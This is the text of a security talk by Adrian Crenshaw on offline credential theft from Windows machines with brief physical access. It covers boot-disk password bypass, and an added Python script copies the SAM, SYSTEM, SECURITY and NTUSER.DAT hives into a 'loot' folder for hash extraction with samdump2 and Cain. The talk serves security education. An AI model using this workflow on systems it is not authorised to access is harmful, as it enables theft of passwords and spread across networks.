Pilfering Local Data:Things an Attacker Would want to Grab with Short Term Local Access
Adrian Crenshaw
About Adrian
- I run Irongeek.com
- I have an interest in InfoSec education
- I don’t know everything - I’m just a geek with time on my hands
- (ir)Regular on: http://www.isdpodcast.com/
Take a note from Johnny Long’s book, and Bruce Potter’s book.
What I plan to cover
Core items an attacker would want to locate and copy off of a Windows system with short-term access
- Data that could be found: passwords, usernames, docs, emails, paths
- Tools they would use to bypass weak security precautions like file system permissions and OS/BIOS passwords
Why this talk is sort of a sham
- If you have short-term access, your goal as an attacker should be to extend that access
- There are so many options for useful files to grab that it is hard to decide which are the most important
- Still useful in the context of stolen and decommissioned equipment, where time is not as critical
How are we getting at the data?
Distros/Boot environments
Just a few:
- BackTrack Linux: http://www.backtrack-linux.org
- Bart’s PE/UBCD4Win: http://www.nu2.nu/pebuilder/ and http://www.ubcd4win.com/
- Winbuilder/Win7PE SE: http://winbuilder.net/ and http://reboot.pro/12427/
- Konboot: http://www.piotrbania.com/all/kon-boot/
BackTrack Linux
- Tons of security tools
- Awesome hardware support for odd wireless needs
- Well maintained
- Can do a hard drive install if you wish
Image from http://www.backtrack-linux.org/screenshots/
Bart’s PE/UBCD4Win
- Bart’s PE can be built from the files on a Windows XP CD
- UBCD4Win is Bart’s PE with a bunch of extras + multi-boot (DBAN)
- Plugins can be made to add functionality
Image from http://www.ubcd4win.com/screen.htm
Winbuilder/Win7PE SE
- Make a Windows-based boot USB/CD/DVD
- Starting OS needed depends on the build
- Plugins can be made to add functionality
- Builds even up to Win7 SP1 32/64-bit
- Hardcore roll-your-own
Image from http://reboot.pro/12427/
Konboot
- Bypasses the password on some versions of Windows and Linux
- Patches the kernel in memory at boot
- Log in to Linux with “kon-usr” as the username; log in to Windows with a blank password
- Meant to run from a CD/floppy; sometimes works from a UFD using the instructions found here: http://www.irongeek.com/i.php?page=security/kon-boot-from-usb
Image from http://www.piotrbania.com/all/kon-boot/
Grab These Files!!!
C:\Windows\System32\config
- SAM
- SYSTEM
- SECURITY
NTUSER.DAT (found in each user’s profile directory) may also be useful, as it maps to HKEY_CURRENT_USER
Hell, get SOFTWARE too while you are at it!
Why these files?
Cain & Abel can extract the following from these hives:
- LSA Secrets: SYSTEM and SECURITY
- Cached (domain logon) passwords: SYSTEM and SECURITY
- SAM hashes: SAM and SYSTEM
WirelessKeyView can recover stored wireless keys from an offline Windows XP installation when pointed at its Windows directory
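To make the “grab these files” step concrete from a boot environment, here is an added example (not from the talk, and not an Irongeek tool) that collects the hives named above from a mounted Windows volume. It assumes the target disk is already mounted (read-only, ideally) under a Linux boot environment such as BackTrack, where paths are case-sensitive even though Windows installs use both WINDOWS\system32 (XP) and Windows\System32 (Vista and later), and it walks both the Documents and Settings (XP) and Users (Vista+) profile layouts for NTUSER.DAT. The volume layout built by demo() is constructed for the example so it runs offline.

```python
import os
import shutil
import tempfile

# Hives under <volume>\Windows\System32\config that the slide says to grab,
# plus the per-user hive (NTUSER.DAT lives in each profile directory).
REGISTRY_HIVES = ("SAM", "SYSTEM", "SECURITY", "SOFTWARE")
USER_HIVE = "NTUSER.DAT"
PROFILE_DIRS = ("Users", "Documents and Settings")  # Vista+ and XP layouts


def find_child(directory, name):
    """Case-insensitive lookup of one entry. A Linux boot environment mounts
    NTFS case-sensitively, but installs use both 'WINDOWS' and 'Windows'."""
    if directory is None or not os.path.isdir(directory):
        return None
    for entry in os.listdir(directory):
        if entry.lower() == name.lower():
            return os.path.join(directory, entry)
    return None


def walk_ci(root, *parts):
    """Resolve a path component by component, case-insensitively."""
    current = root
    for part in parts:
        current = find_child(current, part)
    return current


def locate_hives(volume_root):
    """Return {label: absolute path} for every hive found on the mounted volume."""
    found = {}
    config = walk_ci(volume_root, "Windows", "System32", "config")
    for hive in REGISTRY_HIVES:
        path = find_child(config, hive)
        if path and os.path.isfile(path):
            found[hive] = path
    for profiles in PROFILE_DIRS:
        base = find_child(volume_root, profiles)
        if base is None:
            continue
        for profile in sorted(os.listdir(base)):
            path = find_child(os.path.join(base, profile), USER_HIVE)
            if path and os.path.isfile(path):
                found[USER_HIVE + ":" + profile] = path
    return found


def copy_hives(volume_root, dest):
    """Copy every located hive into dest, preserving timestamps (copy2).
    Returns {label: destination path}."""
    os.makedirs(dest, exist_ok=True)
    copied = {}
    for label, src in locate_hives(volume_root).items():
        dst = os.path.join(dest, label.replace(":", "_"))  # e.g. NTUSER.DAT_Administrator
        shutil.copy2(src, dst)
        copied[label] = dst
    return copied


def demo():
    """Build a constructed XP-style volume layout in a temp dir, collect from it,
    and return {label: file contents} so the result can be checked offline."""
    work = tempfile.mkdtemp()
    try:
        vol = os.path.join(work, "vol")
        config = os.path.join(vol, "WINDOWS", "system32", "config")  # XP casing
        os.makedirs(config)
        for hive in REGISTRY_HIVES:
            with open(os.path.join(config, hive), "wb") as f:
                f.write(b"constructed " + hive.encode())
        profile = os.path.join(vol, "Documents and Settings", "Administrator")
        os.makedirs(profile)
        with open(os.path.join(profile, "ntuser.dat"), "wb") as f:
            f.write(b"constructed NTUSER")
        copied = copy_hives(vol, os.path.join(work, "loot"))
        result = {}
        for label, path in copied.items():
            with open(path, "rb") as f:
                result[label] = f.read()
        return result
    finally:
        shutil.rmtree(work, ignore_errors=True)


if __name__ == "__main__":
    for label, data in demo().items():
        print(label, data)
```

On a real target, call copy_hives("/mnt/target", "/root/loot") after mounting the NTFS volume. Booting from the live environment is what sidesteps the lock the running OS normally holds on SAM, SYSTEM and SECURITY. The copied SAM and SYSTEM pair is what the BackTrack-era workflow fed to bkhive and samdump2 (bkhive SYSTEM key.txt, then samdump2 SAM key.txt; newer samdump2 builds take the SYSTEM and SAM hives directly), and SYSTEM plus SECURITY is what Cain needs for the LSA Secrets and cached credentials.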
Why exploit local passwords?
There are several reasons why an attacker may want to find local passwords:
- To escalate privileges on the local host (install games, sniffers, keystroke loggers and other software, or just to bypass restrictions)
- Local passwords can be used to gain access to other systems on the network; admins may reuse the same usernames and passwords on other network hosts (more than likely if they use hard drive imaging), and similar themes are often used for password selection
- Just for the fun of doing it
Scenario
Imaged systems:
- Attacker grabs a local password on one box
- Uses it on other systems
- Grabs passwords from other systems, and installs keyloggers/sniffers to get network credentials for more systems
- Repeat ad nauseam
Glossary
Cracking a password: De-obfuscating a password’s representation.
Brute force attack: Trying all possible character combinations until a match for the password is found. Also known as an incremental attack in John the Ripper.
Dictionary attack: Trying each entry in a word list until a match for the password is found.
Hashing: Applying a mathematical formula to a piece of text to get a shorter number or string.
One-way hash: A hash where the original string the hash was derived from cannot be easily found by a simple method.
Plain text: The un-obfuscated or un-encrypted form of a string. Opposite of cipher text.
Password hash: The “hashed” version of a password that is stored for later authentication.
Reversible encryption (obfuscation): Encryption that is easily reversed if the algorithm is known. Example: ROT13.
Salt: A value mixed into a hashing or encryption algorithm to increase the number of possible ciphertexts for the same password.